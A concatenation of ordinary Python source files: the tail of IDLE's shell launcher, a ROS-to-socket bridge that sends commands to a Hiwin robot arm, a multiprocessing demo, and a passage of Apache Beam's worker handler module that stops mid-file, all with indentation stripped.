-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# start editor and/or shell windows:
root = Tk(className="Idle")
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif TkVersion >= 8.5:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(file=iconfile) for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
HiwinRA605_socket_ros_test_20190626114057.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
def Socket_command():
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag,arm_mode_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if arm_mode_flag == True:
arm_mode_flag = False
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
03_multiprocessing.py
|
import multiprocessing
import time
start = time.perf_counter()
def do_something(seconds):
print(f'Sleep {seconds} second(s)...')
time.sleep(seconds)
print('Done sleeping...')
processes = []
for _ in range(10):
p = multiprocessing.Process(target=do_something, args=[1.5])
p.start()
processes.append(p)
for process in processes:
process.join()
finish = time.perf_counter()
print(f'Finished in {round(finish-start, 2)} second(s)')
|
worker_handlers.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Code for communicating with the Workers."""
# mypy: disallow-untyped-defs
import collections
import contextlib
import copy
import logging
import queue
import subprocess
import sys
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import BinaryIO # pylint: disable=unused-import
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
from typing import cast
from typing import overload
import grpc
from apache_beam.io import filesystems
from apache_beam.io.filesystems import CompressionTypes
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner.execution import Buffer
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.utils import proto_utils
from apache_beam.utils import thread_pool_executor
from apache_beam.utils.interactive_utils import is_in_notebook
from apache_beam.utils.sentinel import Sentinel
if TYPE_CHECKING:
from grpc import ServicerContext
from google.protobuf import message
from apache_beam.runners.portability.fn_api_runner.fn_runner import ExtendedProvisionInfo # pylint: disable=ungrouped-imports
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
# Time-based flush is enabled in the fn_api_runner by default.
DATA_BUFFER_TIME_LIMIT_MS = 1000
_LOGGER = logging.getLogger(__name__)
T = TypeVar('T')
ConstructorFn = Callable[[
Union['message.Message', bytes],
'sdk_worker.StateHandler',
'ExtendedProvisionInfo',
'GrpcServer'
],
'WorkerHandler']
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
# type: () -> None
self._push_queue = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.InstructionRequest, Sentinel]]
self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]]
self._futures_by_id = dict() # type: Dict[str, ControlFuture]
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
# type: () -> None
assert self._input is not None
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
@overload
def push(self, req):
# type: (Sentinel) -> None
pass
@overload
def push(self, req):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
pass
def push(self, req):
# type: (Union[Sentinel, beam_fn_api_pb2.InstructionRequest]) -> Optional[ControlFuture]
if req is BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
# type: () -> Union[Sentinel, beam_fn_api_pb2.InstructionRequest]
return self._push_queue.get()
def set_input(self, input):
# type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
# type: () -> None
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
def abort(self, exn):
# type: (Exception) -> None
for future in self._futures_by_id.values():
future.abort(exn)
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = Sentinel.sentinel
def __init__(
self,
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
self._worker_manager = worker_manager
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int) # type: DefaultDict[str, int]
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(
ControlConnection) # type: DefaultDict[str, ControlConnection]
def get_conn_by_worker_id(self, worker_id):
# type: (str) -> ControlConnection
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self,
iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse]
context # type: ServicerContext
):
# type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest]
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError(
'All workers communicate through gRPC should have '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
# type: () -> None
self._state = self.DONE_STATE
_LOGGER.debug(
'Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
def GetProcessBundleDescriptor(self, id, context=None):
# type: (beam_fn_api_pb2.GetProcessBundleDescriptorRequest, Any) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._worker_manager.get_process_bundle_descriptor(id)
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]]
_worker_id_counter = -1
_lock = threading.Lock()
control_conn = None # type: ControlConnection
data_conn = None # type: data_plane._GrpcDataChannel
def __init__(self,
control_handler, # type: Any
data_plane_handler, # type: Any
state, # type: sdk_worker.StateHandler
provision_info # type: ExtendedProvisionInfo
):
# type: (...) -> None
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
# type: () -> None
self.stop_worker()
def start_worker(self):
# type: () -> None
raise NotImplementedError
def stop_worker(self):
# type: () -> None
raise NotImplementedError
def control_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
raise NotImplementedError
def artifact_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
raise NotImplementedError
def data_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def state_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def logging_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
@classmethod
def register_environment(
cls,
urn, # type: str
payload_type # type: Optional[Type[T]]
):
# type: (...) -> Callable[[Type[WorkerHandler]], Callable[[T, sdk_worker.StateHandler, ExtendedProvisionInfo, GrpcServer], WorkerHandler]]
def wrapper(constructor):
# type: (Callable) -> Callable
cls._registered_environments[urn] = constructor, payload_type # type: ignore[assignment]
return constructor
return wrapper
@classmethod
def create(cls,
environment, # type: beam_runner_api_pb2.Environment
state, # type: sdk_worker.StateHandler
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> WorkerHandler
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
# This takes a WorkerHandlerManager instead of GrpcServer, so it is not
# compatible with WorkerHandler.register_environment. There is a special case
# in WorkerHandlerManager.get_worker_handlers() that allows it to work.
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self,
unused_payload, # type: None
state, # type: sdk_worker.StateHandler
provision_info, # type: ExtendedProvisionInfo
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self # type: ignore # need Protocol to describe this
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.bundle_processor_cache = sdk_worker.BundleProcessorCache(
SingletonStateHandlerFactory(
sdk_worker.GlobalCachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
worker_manager._process_bundle_descriptors)
self.worker = sdk_worker.SdkWorker(
self.bundle_processor_cache,
state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
# type: () -> None
pass
def stop_worker(self):
# type: () -> None
self.bundle_processor_cache.shutdown()
def done(self):
# type: () -> None
pass
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
# A fake endpoint is needed for properly constructing timer info map in
# bundle_processor for fnapi_runner.
return endpoints_pb2.ApiServiceDescriptor(url='fake')
def state_api_service_descriptor(self):
# type: () -> None
return None
def logging_api_service_descriptor(self):
# type: () -> None
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
# type: (Iterable[beam_fn_api_pb2.LogEntry.List], Any) -> Iterator[beam_fn_api_pb2.LogControl]
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer
):
def __init__(self, base_info, worker_manager):
# type: (beam_provision_api_pb2.ProvisionInfo, WorkerHandlerManager) -> None
self._base_info = base_info
self._worker_manager = worker_manager
def GetProvisionInfo(self, request, context=None):
# type: (Any, Optional[ServicerContext]) -> beam_provision_api_pb2.GetProvisionInfoResponse
if context:
worker_id = dict(context.invocation_metadata())['worker_id']
worker = self._worker_manager.get_worker(worker_id)
info = copy.copy(worker.provision_info.provision_info)
info.logging_endpoint.CopyFrom(worker.logging_api_service_descriptor())
info.artifact_endpoint.CopyFrom(worker.artifact_api_service_descriptor())
info.control_endpoint.CopyFrom(worker.control_api_service_descriptor())
else:
info = self._base_info
return beam_provision_api_pb2.GetProvisionInfoResponse(info=info)
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self,
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(
thread_pool_executor.shared_unbounded_instance())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
thread_pool_executor.shared_unbounded_instance(),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
thread_pool_executor.shared_unbounded_instance(),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer(worker_manager)
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(
self.provision_info.provision_info, worker_manager),
self.control_server)
def open_uncompressed(f):
# type: (str) -> BinaryIO
return filesystems.FileSystems.open(
f, compression_type=CompressionTypes.UNCOMPRESSED)
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.ArtifactRetrievalService(
file_reader=open_uncompressed),
self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer(
DATA_BUFFER_TIME_LIMIT_MS)
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
GrpcStateServicer(state), self.state_server)
self.logging_server = grpc.server(
thread_pool_executor.shared_unbounded_instance(),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(), self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
# type: () -> None
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self,
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler,
self._grpc_server.data_plane_handler,
state,
provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def control_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def artifact_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
